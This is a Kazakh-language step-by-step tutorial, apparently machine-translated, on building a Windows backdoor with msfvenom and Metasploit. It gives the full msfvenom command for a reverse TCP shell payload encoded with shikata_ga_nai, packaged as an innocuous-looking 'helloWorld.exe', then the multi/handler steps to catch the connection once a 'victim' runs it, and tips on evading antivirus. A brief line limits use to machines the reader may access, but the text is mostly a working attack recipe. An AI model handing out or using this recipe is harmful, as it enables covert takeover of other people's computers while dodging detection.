Артқы есік қауіпсіздік механизмдерін айналып өту үшін пайдаланылады, көбінесе жасырын және көбінесе анықталмайды. MSFvenom, msfpayload және msfencode комбинациясын қолданып, кері қабықша TCP көмегімен шабуылдаушыға қайта қосылатын артқы есікті құруға болады. Артқы есікті дамыту үшін кез келген антивирустық бағдарламадан бас тарту үшін зиянды бағдарламаның қолтаңбасын өзгерту қажет. Бұл жобаны кіруге рұқсатыңыз бар компьютерлер жұбында аяқтаңыз, және сіз компьютердің қауіпсіздігі және артқы есіктің бұл түрі қалай жұмыс істейтіні туралы көбірек білесіз.
Қадамдар
Қадам 1. Калини іске қосыңыз және Терминал консолін іске қосыңыз
Қадам 2. Интерфейсті көрсету және IP мекенжайын тексеру үшін ifconfig теріңіз
Қадам 3. Кодерлердің тізімін көрсету үшін msfvenom -l кодерлерін теріңіз
Сіз кодтаушы ретінде x86/shikata_ga_nai қолданасыз
Қадам 4. «msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b» / x00 «-e x86/shikata_ga_nai -f exe> helloWorld.exe теріңіз
- -a x86 -платформалық терезелер архитектураны көрсетеді.
- -p windows/shell/reverse_tcp ендірілетін жүктемені көрсетеді.
- LHOST тыңдаушының IP -адресін белгілейді.
- LPORT тыңдаушы портын белгілейді.
- -b «\ x00» жаман сипаттан аулақ болу үшін белгілейді (нөлдік байттар).
- -e x86/shikata_ga_nai кодерлердің атын көрсетеді.
- -f exe> helloWorld.exe форматты шығаруды белгілейді.
Қадам 5. Metasploit іске қосу үшін msfconsole теріңіз
Енді сіз өзіңіздің артқы есігіңізді жасадыңыз. Жәбірленуші helloWorld.exe файлын шерткенде, ендірілген қабықтың жүктемесі белсендіріледі және сіздің жүйеге қайта қосылады. Қосылымды алу үшін Metasploit-те мультипликаторды ашып, жүктемені орнату қажет
Қадам 6. Use exploit/multi/handler теріңіз
7 -қадам. Windows/shell/reverse_tcp жүктеме жиынтығын енгізіңіз
8 -қадам. Модульді тексеру үшін show параметрлерін теріңіз
Қадам 9. LHOST 192.168.48.129 жиынтығын теріңіз
«LHOST» тыңдаушының IP -адресін белгілейді
Қадам 10. LPORT 4444 жиынтығын теріңіз
«LPORT» тыңдаушы портын белгілейді
Қадам 11. Run деп теріңіз және жәбірленушінің машинасынан қосылуды күтіңіз
Қадам 12. Жәбірленуші helloWorld.exe файлын басқанша күтіңіз
Содан кейін сіз жәбірленушінің машинасына сәтті қосыласыз.
Кеңестер
- -I MSFvenom -да кодтаудың қайталануын көрсетеді. Кейде қайталанулар AV бағдарламалық жасақтамасынан жалтаруға көмектеседі.
- Сіз MSFvenom көмегімен артқы есікті жасауды және кодтауды үйрендіңіз, бірақ бұл әдіс қазіргі уақытта кейбір АВ бағдарламалық жасақтамасына қарсы жақсы жұмыс істемейді. Мұның себебі MSFvenom -да орындалатын шаблондар. АВ сатушылары осы үлгілердің статикалық қолтаңбасын қосты және оларды іздеді. Бұл мәселенің шешімі - басқа орындау үлгісін немесе басқа құралдарды қолдану.